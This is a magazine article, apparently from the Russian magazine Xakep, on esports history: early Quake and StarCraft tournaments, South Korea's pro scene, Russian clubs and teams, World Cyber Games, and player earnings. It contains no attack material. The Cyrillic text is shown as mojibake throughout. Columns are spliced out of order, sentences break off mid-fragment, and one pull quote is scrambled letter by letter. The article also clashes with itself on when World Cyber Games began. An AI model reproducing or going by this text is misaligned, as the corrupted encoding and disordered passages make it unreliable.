ïðîôåññèîíàëüíîãî êèáåðñïîðòñìåíà, çàðàáàòûâàþùåãî íà æèçíü èãðîé.  èþëå 1996

Íàèáîëåå ÿðêèå êèáåðñïîðòèâíûå FPS ñ êîíöà 90-õ ïî ñåé äåíü: Quake II Counter-Strike Quake III Unreal Tournament Series Doom III PainKiller Quake 4 Íàèáîëåå ÿðêèå êèáåðñïîðòèâíûå RTS ñ êîíöà 90-õ ïî ñåé äåíü: StarCraft C&C Series Age of Empires Age of Empires 2 WarCraft III Warhammer ãîäà áûë ïðîâåäåí âòîðîé òóðíèð ñåðèè QuakeCon, ñîáðàâøèé ðåêîðäíîå êîëè÷åñòâî ó÷àñòíèêîâ — áîëåå 650 ÷åëîâåê. Ïðèçîì çà ïåðâîå ìåñòî ñòàë ìîùíûé ïî òåì âðåìåíàì êîìïüþòåð Pentium II 266 MHz. À ÷óòü ïîçæå íà÷àëà ôóíêöèîíèðîâàòü íàèáîëåå ïåðñïåêòèâíàÿ íà ñåãîäíÿøíèé äåíü îðãàíèçàöèÿ Cyberathlete Professional League (CPL), ñîçäàííàÿ Ýíäæåëîì Ìóíüîçîì, êîòîðàÿ ïðîâîäèëà òîãäà ïîä ñâîåé ýãèäîé òóðíèðû ñåðèè Frag. Âñå ýòî — ëèøü àçû êèáåðñïîðòèâíîé èñòîðèè. Ñ òå÷åíèåì âðåìåíè ïðîâîäèëèñü íîâûå è ðàçâèâàëèñü ñòàðûå ÷åìïèîíàòû, ïðèâëåêàÿ â ñåáÿ âñå áîëüøå èãðîêîâ è ñïîíñîðîâ. ÊÈÁÅÐÑÏÎÐÒÑÌÅÍÛ Äëÿ ñïîíñîðîâ ïîäîáíûå ìåðîïðèÿòèÿ ñòàëè ìàðêåòèíãîâûì èíñòðóìåíòîì, îáåñïå÷èâàþùèì ðåêëàìó, à ñëåäîâàòåëüíî, äåëàþùèì âëîæåíèå äåíåã âûãîäíûì. Ñåé÷àñ ñðåäè ñïîíñîðîâ êèáåðñïîðòèâíûõ òóðíèðîâ âûñòóïàþò òàêèå êðóïíûå âñåìèðíî-èçâåñòíûå êîìïàíèè, êàê Intel, ATI, AMD, ABIT, nVidia, Microsoft, Logitech, Samsung, ASUS è ò.ä. Èãðà ïåðåñòàëà áûòü ïðîñòî èãðîé â òðàäèöèîííîì ïîíèìàíèè ýòîãî ñëîâà. Òåïåðü ýòî âèä ñïîðòà, çà êîòîðûé êàæäûé æåëàþùèé, ïðèëîæèâ îïðåäåëåííûå óñèëèÿ, ìîæåò ïîëó÷àòü æèâûå äåíüãè, ñîðåâíîâàíèå ìåæäó ðåàëüíûìè ëþäüìè, à íå ñ êîìïüþòåðîì. Îòëè÷èå ðÿäîâîãî ãåéìåðà îò êèáåðñïîðòñìåíà çàêëþ÷àåòñÿ â öåëîì ðÿäå îñîáåííîñòåé. Îáû÷íûé ãåéìåð âîñïðèíèìàåò èãðó êàê õîááè, ìåòîä äëÿ ðàññëàáëåíèÿ è çàíÿòíîãî âðåìÿïðåïðîâîæäåíèÿ. Åìó íå âàæíî, ìîæåò ëè êòî-ëèáî èãðàòü ëó÷øå. Äëÿ êèáåðñïîðòñìåíà âîñïðèÿòèå èãðû ñîâåðøåííî èíîå, îí

XÀÊÅÐ 01 /85/ 06


Êðóïíåéøèå ðóññêîÿçû÷íûå êèáåðñïîðòèâíûå ïîðòàëû: www.cyberfight.ru www.progamer.ru www.blizzard.ru www.frag.su www.gameinside.com Êðóïíåéøèå ìåæäóíàðîäíûå êèáåðñïîðòèâíûå ïîðòàëû: www.sk-gaming.com www.gotfrag.com www.esreality.com www.esnation.com www.gosugamers.net www.sogamed.com www.teamliquid.net

Ñàéòû êðóïíåéøèõ ìåæäóíàðîäíûõ òóðíèðîâ: www.worldcybergames.com — îôèöèàëüíûé ñàéò World Cyber Games www.wcg.ru — îôèöèàëüíûé ñàéò World Cyber Games Ðîññèÿ www.thecpl.com — îôèöèàëüíûé ñàéò Cyberathlete Professional League www.theweg.net — îôèöèàëüíûé ñàéò World e-Sports Games www.esworldcup.com — îôèöèàëüíûé ñàéò Electronic World Cup Ñàéòû ñïîíñèðóåìûõ îíëàéí-ëëèã: www.ggl.com — ñàéò Global Gaming League www.clanbase.com — ñàéò ClanBase

âñå âðåìÿ ñòðåìèòñÿ äîêàçàòü ñâîå ïðåâîñõîäñòâî. Ïîýòîìó äàëåêî íå âñå èãðîâûå äèñöèïëèíû ïîäõîäÿò ïîä ðàçðÿä êèáåðñïîðòèâíûõ. Êèáåðñïîðòñìåí, êàê è îáû÷íûé ñïîðòñìåí, äëÿ ïîáåäû íàä äðóãèìè, äîëæåí îáëàäàòü âûñîêèìè èãðîâûìè íàâûêàìè: ñêîðîñòüþ, òî÷íîñòüþ, ðåàêöèåé, óìåíèåì ìîëíèåíîñíî àíàëèçèðîâàòü òåêóùóþ ñèòóàöèþ, à òàêæå ìàñòåðñòâîì è îïûòîì. Ñòåðåîòèï î òîì, ÷òî êîìïüþòåðíûå èãðû — óäåë äåòåé, êàíóë â Ëåòó, âåäü áåç òàëàíòà è óïîðíûõ òðåíèðîâîê çäåñü íåëüçÿ äîáèòüñÿ óñïåõîâ. Ñ ðîñòîì ÷èñëà êîìïüþòåðíûõ êëóáîâ, à òàêæå ïîäêëþ÷åííûõ ê Èíòåðíåòó ïîëüçîâàòåëåé, çíà÷èòåëüíî âîçðîñëà è êîíêóðåíöèÿ â äàííîé ñôåðå: ñòàòü ëó÷øèì òåïåðü íàìíîãî ñëîæíåå, òàê êàê îáùèé óðîâåíü èãðû ãåéìåðîâ çíà÷èòåëüíî ïîâûñèëñÿ. Åñëè ãåéìåðîì ìîæåò áûòü êàê ñîâñåì ðåáåíîê, òàê è ïîæèëîé ÷åëîâåê, òî âîçðàñò êèáåðñïîðòñìåíà îáû÷íî îãðàíè÷åí óçêèìè ðàìêàìè îò 17 äî 23 ëåò. Ó áîëüøèíñòâà ëþäåé ìîëîæå 17 ëåò îòñóòñòâóåò íåîáõîäèìàÿ äëÿ êàðüåðû ïðîôåññèîíàëüíîãî èãðîêà ñïîñîáíîñòü ê ñòðàòåãè÷åñêîìó ìûøëåíèþ, à ïîñëå 23 ëåò ðåôëåêñû è ðåàêöèÿ ñòàíîâÿòñÿ ñëèøêîì ìåäëåííûìè, ÷òîáû áûñòðî è àäåêâàòíî ðåàãèðîâàòü íà èçìåíÿþùèéñÿ ãåéìïëåé. Êîíå÷íî, èíîãäà âñòðå÷àþòñÿ è ðåäêèå èñêëþ÷åíèÿ. Ïîýòîìó åñëè òû ðåøèøü ñòàòü êèáåðñïîðòñìåíîì, ëó÷øå íå ìå÷òàé î ëåãêîé íàæèâå. Ýòî ðóòèííàÿ ðàáîòà, òðåáóþùàÿ ïîñòîÿííîãî ñîâåðøåíñòâîâàíèÿ, âåäü íà ïëàâó äåðæàòñÿ òîëüêî ëó÷øèå èç ëó÷øèõ. Ãîíîðàðû ñèëüíåéøèõ ïðîãåéìåðîâ áîëåå ÷åì äîñòîéíû. Ñàìûé âûñîêîîïëà÷èâàåìûé êîíòðàêò çà âñþ èñòîðèþ, çàêëþ÷åííûé ñ ïðîãåéìåðîì — $180,000, ïëþñ åæåãîäíûå áîíóñû äîñòèãàþò $80,000 (àïðåëü 2005 ãîäà, Þæíàÿ Êîðåÿ, êîíòðàêò òåëåêîììóíèêàöèîííîé êîìïàíèè SK Telecom T1 ñ ïðîãåéìåðîì StarCraft: BroodWar — Ëèì 'SlayerS_`BoxeR`' Éî Õâàí). Ìàêñèìàëüíûé âûèãðûø â èñòîðèè êèáåðñïîðòà èãðîêîì çà ïîáåäó â îäíîì ìàò÷å — $150,000 (ñåðåäèíà íîÿáðÿ 2005 ãîäà, çà ïîáåäó â ôèíàëå CPL World Tour 2005 ïî PainKiller, ïðèç äîñòàëñÿ ëåãåíäàðíîìó FPS-ïðîãåéìåðó Äæîíàòàíó 'Fatal1ty' Âýíäåëó). Ýòè öèôðû íàìíîãî ìåíüøå, ÷åì àíàëîãè÷íûå â íåêîòîðûõ òðàäèöèîííûõ âèäàõ ñïîðòà, íî ãîä îò ãîäà ñòàâÿòñÿ íîâûå ðåêîðäû, è äåíåæíûå âûïëàòû ñòàíîâÿòñÿ âñå áîëüøå.

çâåçäà ðîññèéñêîãî êâåéêà Cooller

Quake 3 — îäíà èç ñàìûõ ïîïóëÿðíûõ êèáåðñïîðòèâíûõ èãð êóìèðû òûñÿ÷ êîðåéöåâ — ïðîãåéìåðû

Doom — èãðà, ñ êîòîðîé íà÷àëàñü ýðà êèáåðñïîðòà

ñàìûé âûñîêîîïëà÷èâàåì ûé êèáåðñïîðòñìåí Slayers_Boxer

ÞÆÍÎÊÎÐÅÉÑÊÈÉ ÔÅÍÎÌÅÍ Þæíàÿ Êîðåÿ ñòàëà ëèäèðóþùåé ñòðàíîé â ìèðå ïî ðàçâèòèþ êèáåðñïîðòà. Ñóùåñòâóåò íåñêîëüêî þæíîêîðåéñêèõ òåëåâèçèîííûõ êàíàëîâ, êðóãëîñóòî÷íî òðàíñëèðóþùèõ èãðîâûå ìàò÷è, ðåãóëÿðíî ïðîâîäÿòñÿ êðóïíûå ëèãè ñ îáùèì ïðèçîâûì ôîíäîì

XÀÊÅÐ 01 /85/ 06

097


ÑÖÅÍÀ ///// ISSUE

êàæäîé îêîëî $40,000. Ê èãðàì íà ëèãàõ äîïóñêàþòñÿ òîëüêî ïðîãåéìåðû, êîòîðûå ïîëó÷àþò ëèöåíçèè â Êîðåéñêîé Êèáåðñïîðòèâíîé Àññîöèàöèè. Êàê è ëþáîé äðóãîé ñïîðò, êîìïüþòåðíûé ñïîðò íåñåò â ñåáå ýëåìåíò çðåëèùíîñòè, äåëàÿ åãî èíòåðåñíûì íå òîëüêî äëÿ ñàìèõ èãðîêîâ, íî è äëÿ íàáëþäàòåëåé.  Êîðåå ôèíàëû îñíîâíûõ êèáåðñïîðòèâíûõ ëèã ïî ñòðàòåãè÷åñêîé èãðå StarCraft: BroodWar ïðîâîäÿòñÿ íà ñòàäèîíàõ è â îãðîìíûõ çàëàõ, âìåùàþùèõ áîëåå 100,000 çðèòåëåé. Ïàðàëëåëüíî îãðîìíàÿ àóäèòîðèÿ ñëåäèò çà ïðÿìîé òðàíñëÿöèåé ïî òåëåâèäåíèþ. Êðóïíåéøèå êîðåéñêèå êîðïîðàöèè (KTF, SK Telecom, Pantech&Curitel, Samsung è äð.) äåëàþò ñåáå ðåêëàìó, ñîçäàâàÿ èç êóïëåííûõ èãðîêîâ ñâîè êîìàíäû. StarCraft ñòàë òàì îäíèì èç íàöèîíàëüíûõ âèäîâ ñïîðòà íàðÿäó ñ ôóòáîëîì, áåéñáîëîì è áàñêåò-

ãðàíèö, ÿçûê ãåéìåðîâ ïîíÿòåí âî âñåì ìèðå, äàæå íåñìîòðÿ íà íàëè÷èå ñîáñòâåííîãî ïðîôåññèîíàëüíîãî ñëåíãà â ðàçëè÷íûõ äèñöèïëèíàõ.  òî æå âðåìÿ ãåéìåðó îòêðûâàåòñÿ âîçìîæíîñòü ñîçäàíèÿ/âñòóïëåíèÿ â êëàíû è êîìàíäû, êîòîðûå ìîãóò áûòü ïðîôåññèîíàëüíûìè è äðóæåñêèìè, îíëàéíîâûìè (÷åðåç Èíòåðíåò) è îôôëàéíîâûìè (â ðåàëå). Îñîáåííîñòü êèáåðñïîðòñìåíà îïðåäåëÿåòñÿ íå òîëüêî åãî ñëåíãîì, íî è òàêîé ñóãóáî «èíòèìíîé» âåùüþ, êàê èãðîâûå äåâàéñû. Êàæäûé èãðîê ñàì âûáèðàåò ñåáå ïðîôåññèîíàëüíûé èíñòðóìåíò äëÿ äîñòèæåíèÿ öåëè: êëàâèàòóðó, ìûøü (äæîéñòèê èëè èíûå äåâàéñû, íàïðèìåð äëÿ ñïîðòèâíûõ ñèìóëÿòîðîâ), íàóøíèêè, è äàæå êîâðèê äëÿ ìûøè! Èç ìûøåê ó êèáåðñïîðòñìåíîâ íàèáîëüøåé ïîïóëÿðíîñòüþ ïîëüçóþòñÿ ìîäåëè îò Logitech, Microsoft è Razer. Èí-

ÊÈÁÅÐÑÏÎÐÒ Â ÐÎÑÑÈÈ Â àâãóñòå 1996 ãîäà â Ìîñêâå îòêðûëñÿ ïåðâûé â èñòîðèè íàøåé ñòðàíû êîìïüþòåðíûé êëóá, êîòîðûé íàõîäèëñÿ â ïîäâàëå ïîìåùåíèÿ, ïðèíàäëåæàâøåãî âèííîìó ìàãàçèíó. Êëóá íàçûâàëñÿ «Îðêè», íà åãî áàçå âïîñëåäñòâèè áûëà ñîçäàíà îäíîèìåííàÿ ëåãåíäàðíàÿ êîìàíäà RTS-èãðîêîâ.  ñåðåäèíå àâãóñòà 1996 ãîäà èç äâóõ ñòîëè÷íûõ êëàíîâ DNMD (Duke Nukem Must Die) è QnR (Quake New Religion) îáðàçîâàëàñü îäíà èç ïåðâûõ ðîññèéñêèõ FPS-êîìàíä DDT (Devils Dream Team), êîòîðàÿ äîìèíèðîâàëà íà ðîññèéñêîé àðåíå äîâîëüíî äîëãîå âðåìÿ. 27 îêòÿáðÿ òîãî æå ãîäà â Ìîñêîâñêîì Ôèçèêî-Òåõíè÷åñêîì Èíñòèòóòå ñîñòîÿëèñü ñîðåâíîâàíèÿ ïî êîìïüþòåðíîé èãðå Doom. Òóðíèð ñ ó÷àñòèåì âîñüìè çàÿäëûõ ãåéìåðîâ

ÒÎÉ, Ó×ÅÁÎÉ, ÂÀÒÜ ÂÑÅÌ: ÐÀÁÎÒ ÂÎ Ò ÅÐÒ Æ ß Ñß Ò ÈÒ Ä ÕÎ ÐÈ Ï ÎÊ Î ÐÀÄÈ ÒÐÅÍÈÐ ×ÍÎÉ ÆÈÇÍÜÞ.. ÄÍÛÌÈ È ÁËÈÇÊÈÌÈ, ËÈ× ÒÍÎØÅÍÈßÌÈ Ñ ÐÎÄ ÎÒ áîëîì. Èãðîêè êîìàíäû âûñòóïàþò íà òóðíèðàõ â ñïîíñîðñêîé óíèôîðìå è ó÷àñòâóþò âî âñåâîçìîæíûõ ïðîìî- è ðåêëàìíûõ àêöèÿõ, ïðèâëåêàÿ ïîòðåáèòåëåé.  ñâîþ î÷åðåäü, ñïîíñèðóåìàÿ êîìàíäà ïðåäîñòàâëÿåò èãðîêàì çàðàáîòíóþ ïëàòó, óñëîâèÿ äëÿ ïðîæèâàíèÿ, ïèòàíèÿ è òðåíèðîâîê â êîìàíäíûõ àïàðòàìåíòàõ. Ìåíåäæåðû êîìàíä ñëåäÿò çà ãðàôèêîì òðåíèðîâîê èãðîêîâ (íåêîòîðûå ïåðåä âàæíûìè ìàò÷àìè òðåíèðóþòñÿ ïðàêòè÷åñêè êðóãëîñóòî÷íî) è èõ óñïåõàìè. Ñóùåñòâóåò è òðàíñôåðíûé ðûíîê: êîíòðàêòû íàèáîëåå óñïåøíûõ ïðîãåéìåðîâ ìîãóò ïåðåêóïàòüñÿ çà áîëüøèå äåíüãè äðóãèìè êîìàíäàìè. ×òî êàñàåòñÿ ñàìèõ ïðîãåéìåðîâ, òî îíè ñòàíîâÿòñÿ çâåçäàìè íàöèîíàëüíîãî ìàñøòàáà ñî ñâîèìè ôàí-êëóáàìè, íàñ÷èòûâàþùèìè äî 600 òûñÿ÷ ÷åëîâåê. ÏËÞÑÛ È ÌÈÍÓÑÛ Âîçìîæíîñòü çàðàáàòûâàòü äåíüãè èãðîé è ïðè ýòîì ñòàòü èçâåñòíûì â îïðåäåëåííûõ êðóãàõ ïðèâëåêàåò ìíîãèõ. Íî áîëüøàÿ ÷àñòü ëþäåé îñòàíàâëèâàåòñÿ íà ïîëïóòè, íå âûäåðæàâ ðåàëüíîé íàãðóçêè. Èãðà ïåðåñòàåò ïðèíîñèòü óäîâîëüñòâèå. Ðàäè òðåíèðîâîê ïðèõîäèòñÿ æåðòâîâàòü âñåì: ðàáîòîé, ó÷åáîé, îòíîøåíèÿìè ñ ðîäíûìè è áëèçêèìè, ëè÷íîé æèçíüþ. Âçàìåí êèáåðñïîðòñìåí ïîëó÷àåò ÷óâñòâî ïðèíàäëåæíîñòè ê òàêèì åñòåñòâåííûì ôîðìèðîâàíèÿì, êàê èãðîâîå è êèáåðñïîðòèâíîå êîìüþíèòè. Äëÿ òàêîãî ñîîáùåñòâà íå ñóùåñòâóåò òåððèòîðèàëüíûõ

098

äèâèäóàëüíû è ñèñòåìíûå íàñòðîéêè, òàêèå êàê ÷óâñòâèòåëüíîñòü ìûøè, êîíôèãè è ò.ï. Ëþáîé êèáåðñïîðòñìåí äîëæåí õîðîøî ðàçáèðàòüñÿ â êîìïüþòåðàõ è íîâåéøèõ òåõíîëîãèÿõ. Ñàìà èãðà îáåñïå÷èâàåò èãðàþùåìó è çðèòåëÿì íåçàáûâàåìûå ýìîöèè, âñïëåñê àäðåíàëèíà. Ñõîäè íà ëþáîé êèáåðñïîðòèâíûé òóðíèð, è òû â ïîëíîé ìåðå îùóòèøü ñîâåðøåííî íîâóþ êóëüòóðó, íåçíàêîìóþ ÷åëîâåêó, äàëåêîìó îò êîìïüþòåðíîãî ñïîðòà. Íåìàëîâàæíûì ôàêòîðîì, ïðèâëåêàþùèì èãðîêîâ â êèáåðñïîðò, ÿâëÿåòñÿ îáùåíèå è îáìåí îïûòîì ñ èãðîêàìè èç äðóãèõ ñòðàí, à òàêæå âîçìîæíîñòü ïóòåøåñòâîâàòü ïî ìèðó. Ãåéìåðû íàõîäÿò ñïîíñîðîâ, îïëà÷èâàþùèõ ïîåçäêè íà êðóïíûå ìåæäóíàðîäíûå òóðíèðû, ïðîâîäÿùèåñÿ â ðàçëè÷íûõ ñòðàíàõ, è îïðàâäûâàþò âëîæåííûå ñðåäñòâà äîñòîéíûì âûñòóïëåíèåì. Ó ñàìûõ êðóïíûõ òóðíèðîâ ñóùåñòâóåò ñèñòåìà íàöèîíàëüíûõ îòáîðî÷íûõ èãð â ñòðàíàõ, ïîáåäèòåëè êîòîðûõ, ïîìèìî äåíåæíîãî ïðèçà, ïîëó÷àþò îïëà÷èâàåìóþ ïóòåâêó íà ôèíàë â äðóãóþ ñòðàíó (ïðèìåðàìè ìîãóò ñëóæèòü òóðíèðû WEG, ACON, WCG, ESWC è äð.). Ãëàâíûå ìèíóñû ñîñòîÿò â òîì, ÷òî ìîæíî ñåðüåçíî ïîäîðâàòü çäîðîâüå è íåðâíóþ ñèñòåìó (â Þæíîé Êîðåå èçâåñòíû ñëó÷àè ëåòàëüíîãî èñõîäà ïîñëå ìíîãî÷àñîâîé èãðû ãåéìåðîâ â êîìïüþòåðíûõ êëóáàõ áåç ïåðåðûâà, åäû è îòäûõà). À òàê æå ôèíàíñîâûå çàòðàòû: ïîêóïêà äåâàéñîâ, ïëàòà ðåãèñòðàöèîííûõ âçíîñîâ íà òóðíèðàõ è áîëüøèå óñèëèÿ äëÿ íàõîæäåíèÿ ñïîíñîðîâ.

ïðîâîäèëñÿ ïî êðóãîâîé ñèñòåìå è âïåðâûå ñîáðàë áîëüøîå êîëè÷åñòâî çðèòåëåé. Ñ ýòîãî íà÷èíàëîñü ôîðìèðîâàíèå ðîññèéñêèõ RTS- è FPS-øêîë. Ãåéìåðû ïðèõîäèëè è óõîäèëè, à îïûò ïåðåäàâàëñÿ èç ïîêîëåíèÿ â ïîêîëåíèå. Òåì íå ìåíåå äîìèíèðîâàëè èãðîêè Ìîñêâû è Ñàíêò-Ïåòåðáóðãà, âðåìÿ îò âðåìåíè âûÿñíÿâøèå îòíîøåíèÿ ìåæäó ñîáîé. Ñ ïîÿâëåíèåì êîìïüþòåðíûõ êëóáîâ â Ðîññèè ñòàëà ïîïóëÿðíà èãðà ïî Ñåòè, êîòîðàÿ ðàíåå íå áûëà äîñòóïíà èç-çà îòâðàòèòåëüíîãî ïîäêëþ÷åíèÿ ê Èíòåðíåòó. Ïðîâîäèëèñü ñîðåâíîâàíèÿ, ãäå ïåðâûå ãåéìåðû ñàìè ïðîêëàäûâàëè ñåáå äîðîãó ê ïîáåäàì, èì áûëî íåêîìó ïîäðàæàòü. Ñ ïîÿâëåíèåì âîçìîæíîñòè ïðîñìîòðà äåìîê (ñîõðàíåííûõ çàïèñåé èãðû), êàæäûé íîâè÷îê ìîã ñìîòðåòü íà èãðó ñèëüíûõ ïðîãåéìåðîâ è, êîïèðóÿ èõ äåéñòâèÿ, ñàìîñòîÿòåëüíî ñîâåðøåíñòâîâàòüñÿ. Îäíàêî ðàçâèòèå êèáåðñïîðòà â Ðîññèè øëî çàìåòíî ìåäëåííåå, ÷åì çà ðóáåæîì. Ñîâåòñêèå ñòåðåîòèïû íåñåðüåçíîñòè èãðóøåê è ïëîõàÿ ýêîíîìè÷åñêàÿ ñèòóàöèÿ â ñòðàíå íå ïîçâîëÿëè ãåéìåðàì ñäåëàòü ñâîå êîìüþíèòè ïðîôåññèîíàëüíûì. Íàãðàäîé çà ïîáåäû áûëî óâàæåíèå ñî ñòîðîíû äðóãèõ èãðîêîâ, íî î ôèíàíñîâîì ïîîùðåíèè ðå÷è äàæå íå øëî. Ïîòðåáîâàëîñü íåñêîëüêî ëåò, ÷òîáû ðîññèéñêèé êèáåðñïîðò âûáðàëñÿ èç àíäåãðàóíäà, è íà íåãî îáðàòèëè âíèìàíèå ëþäè, ñïîñîáíûå ïîìî÷ü äàëüíåéøåìó ðàçâèòèþ.

XÀÊÅÐ 01 /85/ 06


Ê 2000 ãîäó â Ðîññèè ñòàëè ïðîâîäèòüñÿ ïåðâûå ÷åìïèîíàòû ñ äîñòîéíûìè ïðèçîâûìè ôîíäàìè è ñïîíñîðñòâîì. À ñïóñòÿ åùå ãîä âëàñòü óñëûøàëà è ïðèçíàëà ðîññèéñêèõ êèáåðàòëåòîâ, âêëþ÷èâ êîìïüþòåðíûé ñïîðò â ñïèñîê ðåêîìåíäóåìûõ äëÿ ðàçâèòèÿ â ÐÔ. Ïîçæå ñòàëè âîçíèêàòü âñåâîçìîæíûå íåçàâèñèìûå êèáåðñïîðòèâíûå îðãàíèçàöèè, òàê èëè èíà÷å ñïîñîáñòâîâàâøèå ïðîäâèæåíèþ êîìïüþòåðíîãî ñïîðòà â íàøåé ñòðàíå. Ñåé÷àñ êèáåðñïîðòèâíûå òóðíèðû ïðèâëåêàþò âñå áîëüøåå âíèìàíèå ÑÌÈ è ïðîõîäÿò ïðè ïîääåðæêå âëàñòåé. WORLD CYBER GAMES Ãîâîðÿ îá èñòîðèè êèáåðñïîðòà è âîçìîæíîñòÿõ, êîòîðûå îí îòêðûâàåò ïåðåä èãðîêàìè, ñëåäóåò óïîìÿíóòü åæåãîäíî ïðîâîäÿùèåñÿ ñ 2001 ãîäà World Cyber Games — «Îëèìïèéñêèå èãðû» ïî êîìïüþòåðíîìó ñïîðòó, ñ ñèñòåìîé íàöèîíàëüíûõ è ðåãèîíàëüíûõ îòáîðî÷íûõ òóðîâ. Çà ïðîøåäøåå âðåìÿ òóðíèð ñòàë êðóïíåéøèì â ìèðå ôåñòèâàëåì âèäåî- è êîìïüþòåðíûõ èãð, ïðèíÿâøèì íà ãðàíä ôèíàë 2005 ãîäà â Ñèíãàïóðå (6—20 íîÿáðÿ) ñâûøå 800 èãðîêîâ, ïîáåäèâøèõ íà îòáîðî÷íûõ â ðàçëè÷íûõ äèñöèïëèíàõ â 70 ñòðàíàõ ìèðà. Ñ ìîìåíòà ïîÿâëåíèÿ òóðíèðà ãðàíä ôèíàëû ñ 2000 ïî 2003 ãîä ïðîâîäèëèñü â Þæíîé Êîðåå, à â 2004 ãîäó áûë âïåðâûå ïðîâåäåí çà åå ïðåäåëàìè — â ãîðîäå Ñàí-Ôðàíöèñêî (ÑØÀ). Åãî îáùèé ïðèçîâîé ôîíä â ýòîì ãîäó ñîñòàâèë áîëåå $400,000. Ñòîëèöåé ãðàíä-ôèíàëà WCG 2006 áûë ïðèçíàí èòàëüÿíñêèé ãîðîä Ìîíöà, èçâåñòíûé ñâîèì àâòîäðîìîì Ôîðìóëû-1, ãäå è áóäóò ïðîõîäèòü èãðû. WCG äàåò ïðåêðàñíûé øàíñ ðåàëèçîâàòüñÿ òàëàíòëèâûì èãðîêàì. Âûáåðè îäíó èç îôèöèàëüíûõ êèáåðñïîðòèâíûõ äèñöèïëèí (â 2005 ãîäó íà ðîññèéñêèõ îòáîðî÷íûõ ýòî áûëè: Counter-Strike: Source, FIFA Soccer 2005, Need for Speed: Underground 2, StarCraft: Brood War, WarCraft III: The Frozen Throne, Warhammer 40k: Dawn of War), êîòîðûå áóäóò îïóáëèêîâàíû âåñíîé ñëåäóþùåãî ãîäà, òðåíèðóéñÿ, ïîáåæäàé ó ñåáÿ â ðåãèîíå, à çàòåì íà ðîññèéñêîì ôèíàëå â Ìîñêâå. È âîò òû óæå â Èòàëèè. Åñëè íà Çàïàäå íà÷èíàþùèõ èãðîêîâ îáúåäèíÿåò Èíòåðíåò, òî ó íàñ ãëàâíûìè öåíòðàìè ðàçâèòèÿ êèáåðñïîðòà îñòàþòñÿ êîìïüþòåðíûå êëóáû. Ïðè÷èíû òîìó — êà÷åñòâî è ñòîèìîñòü âûõîäà âî âñåìèðíóþ Ñåòü. WCG äàþò èãðîêàì âñåõ ðåãèîíîâ øàíñ âñòðåòèòüñÿ ñ ñèëüíåéøèìè ïðîãåéìåðàìè è äîêàçàòü, ÷òî ñâîè òàëàíòû åñòü íå òîëüêî â Ìîñêâå èëè Ñàíêò-Ïåòåðáóðãå. Ïî êàæäîé äèñöèïëèíå â ñëåäóþùåì ãîäó îò Ðîññèè áóäåò îòïðàâëåíî íåñêîëüêî èãðîêîâ, èõ êîëè÷åñòâî îïðåäåëÿåòñÿ êâîòàìè, âûäåëÿåìûìè îðãàíèçàòîðàìè ñòðàí äëÿ ó÷àñòèÿ â ãðàíä-ôèíàëå. Ïðèãëÿäèñü ê ëîãîòèïó WCG, íà êîòîðîì èçîáðàæåíû çíàêîìûå îëèìïèéñêèå êîëüöà. Ïîñìîòðè, êòî ÿâëÿåòñÿ ãåíåðàëüíûì ñïîíñîðîì, — êîìïàíèÿ Samsung

XÀÊÅÐ 01 /85/ 06

Electronics, êîòîðàÿ ñïîíñèðóåò Îëèìïèéñêèå èãðû, è òû ïîéìåøü, ÷òî îôèöèàëüíûé ñëîãàí òóðíèðà «Áîëüøå, ÷åì èãðà» — íå ïóñòûå ñëîâà. Ïðèçîâîé ôîíä ðîññèéñêîãî îòáîðî÷íîãî òóðíèðà ñîñòàâèë â ýòîì ãîäó $100,000, èç íèõ $25,000 ïðèøëîñü íà ðåãèîíû, $60,000 — íà ôèíàë â Ìîñêâå, à $15,000 áûëî çàòðà÷åíî íà ïîäãîòîâêó êèáåðñáîðíîé Ðîññèè.  ïîñëåäíèå ãîäû ðîññèéñêèå èãðîêè ñòàáèëüíî âõîäèëè â ÷èñëî ïðåòåíäåíòîâ íà âûñøèå íàãðàäû. Ïåðâûå áîëüøèå óñïåõè ê ðîññèÿíàì ïðèøëè óæå íà òóðíèðå â 2001 ãîäó, êîãäà èãðîê ïîä íèêîì LeXeR, óñïåøíî âûñòóïàþùèé íà ìåæäóíàðîäíûõ òóðíèðàõ è ïî ñåé äåíü, âûèãðàë ñåðåáðÿíóþ ìåäàëü ïî Quake III. Íà ìèðîâîì ôèíàëå â 2002 ãîäó, ðîññèÿíå âûèãðàëè ñîðåâíîâàíèÿ â òðåõ äèñöèïëèíàõ: Quake III 1v1 (Àëåêñåé "uNkind" Ñìàåâ), Quake III 2v2 (unKind & Cooller) è Counter Strike (ëåãåíäàðíàÿ ïèòåðñêàÿ êîìàíäà M19), è ïî îáùåé ñóììå ïðèçîâûõ îáîøëè äàæå õîçÿåâ òóðíèðà — êîðåéöåâ. Îñîáîãî âíèìàíèÿ çàñëóæèâàåò ñàìàÿ ïîïóëÿðíàÿ íà ñåãîäíÿøíèé äåíü â Ðîññèè äèñöèïëèíà — Counter-Strike: â íåé ðîññèéñêèå èãðîêè ÿâëÿþòñÿ îäíèìè èç ìèðîâûõ ëèäåðîâ è ïîäíèìàþòñÿ íà ïüåäåñòàë ïî÷åòà êðóïíåéøèõ ñîðåâíîâàíèé.  äðóãèõ äèñöèïëèíàõ ðîññ��éñêèå ãåéìåðû òàêæå ðåãóëÿðíî âõîäÿò â ÷èñëî ïðèçåðîâ. ÈÍÔÎÐÌÀÖÈÎÍÍÎÅ ÎÑÂÅÙÅÍÈÅ Êèáåðñïîðòèâíûå ñîáûòèÿ â ïîëíîé ìåðå îñâåùàþòñÿ íà ñòðàíèöàõ ðîññèéñêèõ è ìåæäóíàðîäíûõ ïîðòàëîâ. Êðóïíåéøèì ïî ñîäåðæàíèþ è ïîñåùàåìîñòè ïîðòàëîì íà òåððèòîðèè Ðîññèè è ñòðàí ÑÍà óæå íåñêîëüêî ëåò ÿâëÿåòñÿ åæåäíåâíûé êèáåðñïîðòèâíûé äàéäæåñò — CyberFight.Ru. Íà åãî ñòðàíèöàõ ìîæíî óçíàòü âñþ ïîñëåäíþþ èíôîðìàöèþ èç ìèðà êîìïüþòåðíîãî ñïîðòà, ïðî÷èòàòü àêòóàëüíûå àâòîðñêèå ñòàòüè, êîëîíêè. Ñàéò ïðåäîñòàâëÿåò âîçìîæíîñòü ïîñåòèòåëÿì âæèâóþ ñëåäèòü çà õîäîì êðóïíåéøèõ êèáåðñïîðòèâíûõ òóðíèðîâ è ïðîñìàòðèâàòü ýêñêëþçèâíûé ôîòîìàòåðèàë, îáåñïå÷èâàÿ èõ ïðÿìûìè ðåïîðòàæàìè. Äëÿ èãðîêîâ äîñòóïíà ðåãóëÿðíî îáíîâëÿåìàÿ áàçà äåìîçàïèñåé èãð â ðàçëè÷íûõ äèñöèïëèíàõ, à òàêæå ðàñïèñàíèå âñåõ 